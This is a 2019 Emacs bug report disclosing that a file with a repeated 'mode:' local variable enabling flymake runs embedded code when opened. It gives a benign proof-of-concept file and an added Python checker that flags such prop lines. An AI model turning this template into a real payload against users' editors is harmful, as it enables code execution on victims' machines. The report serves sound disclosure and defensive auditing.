From: adam plaice
Newsgroups: gmane.emacs.bugs
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution
Date: Tue, 8 Oct 2019 10:48:32 +0200
To: 37656@debbugs.gnu.org
Resent-CC: bug-gnu-emacs@gnu.org
X-GNU-PR-Message: report 37656
X-GNU-PR-Package: emacs
Xref: news.gmane.org gmane.emacs.bugs:168614

* To reproduce:

1. Create a file, say `~/foobar' (it could have an arbitrary extension), with
   the following contents:

   -*- mode: emacs-lisp; mode: flymake -*-
   (eval-when-compile
     (with-temp-file "~/emacs_flymake_security_bug"
       (insert "Could have also executed any code.")))

2. Open the file with emacs:

   emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

   cat ~/emacs_flymake_security_bug

* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be repeated
more than once, to also specify minor modes.  Just having:

-*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug.  There may,
however, be alternative ways of triggering it that I haven't come up with.

This was "inspired" by a very similar bug (concerning an external package,
editorconfig), described here:

https://illikainen.dev/blog/2019-10-06-editorconfig

Thank you and best regards,

Adam

In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
 of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS

Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.

Configured using:
 'configure --with-modules --without-pop'

Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY ACL
LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP

Important settings:
  value of $LANG: en_GB.UTF-8
  locale-coding-system: utf-8-unix

Major mode: Lisp Interaction
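The repeated `mode:` mechanism the report describes, as an added example that is not part of the bug report or of Emacs itself: a small Python checker that reads a file's `-*- ... -*-` prop line the way Emacs does (first line, or through the second line after a `#!` line; a bare name means `mode:`) and lists the extra minor modes it would switch on, so untrusted files can be audited before they are visited. The sample file contents are constructed for the example.

```python
import re
from typing import Dict, List

PROP_LINE_RE = re.compile(r"-\*-(.*?)-\*-")

# Constructed samples (not files from the report): the reporter's trigger
# layout, a benign file, and a script whose prop line follows a #! line.
SAMPLE_TRIGGER = ('-*- mode: emacs-lisp; mode: flymake -*-\n'
                  '(eval-when-compile (message "runs when the buffer is byte-compiled"))\n')
SAMPLE_BENIGN = '-*- mode: emacs-lisp -*-\n(defun answer () 42)\n'
SAMPLE_SHEBANG = '#!/bin/sh\n# -*- mode: sh; mode: flymake -*-\necho ok\n'

def parse_prop_line(text: str) -> Dict[str, List[str]]:
    """Return the prop-line settings as name -> values, in file order.

    Emacs looks for -*- ... -*- on the first line, or through the second line
    when the first starts with '#!'.  A bare '-*- NAME -*-' means 'mode: NAME'.
    Repeated names are kept: each 'mode:' after the first is a minor mode.
    """
    lines = text.splitlines()
    if not lines:
        return {}
    region = "\n".join(lines[:2]) if lines[0].startswith("#!") else lines[0]
    match = PROP_LINE_RE.search(region)
    if not match:
        return {}
    body = match.group(1).strip()
    if ":" not in body:
        return {"mode": [body]} if body else {}
    settings: Dict[str, List[str]] = {}
    for item in body.split(";"):
        if ":" not in item:
            continue
        name, value = item.split(":", 1)
        settings.setdefault(name.strip(), []).append(value.strip())
    return settings

def extra_modes(text: str) -> List[str]:
    """Minor modes a prop line would enable through repeated 'mode:' entries.

    The first 'mode:' picks the major mode; every further one is enabled when
    the file is visited, the path the report abuses (flymake on emacs-lisp).
    """
    return parse_prop_line(text).get("mode", [])[1:]

if __name__ == "__main__":
    for label, sample in (("trigger", SAMPLE_TRIGGER), ("benign", SAMPLE_BENIGN),
                          ("shebang", SAMPLE_SHEBANG)):
        print(f"{label}: extra modes enabled = {extra_modes(sample)}")
```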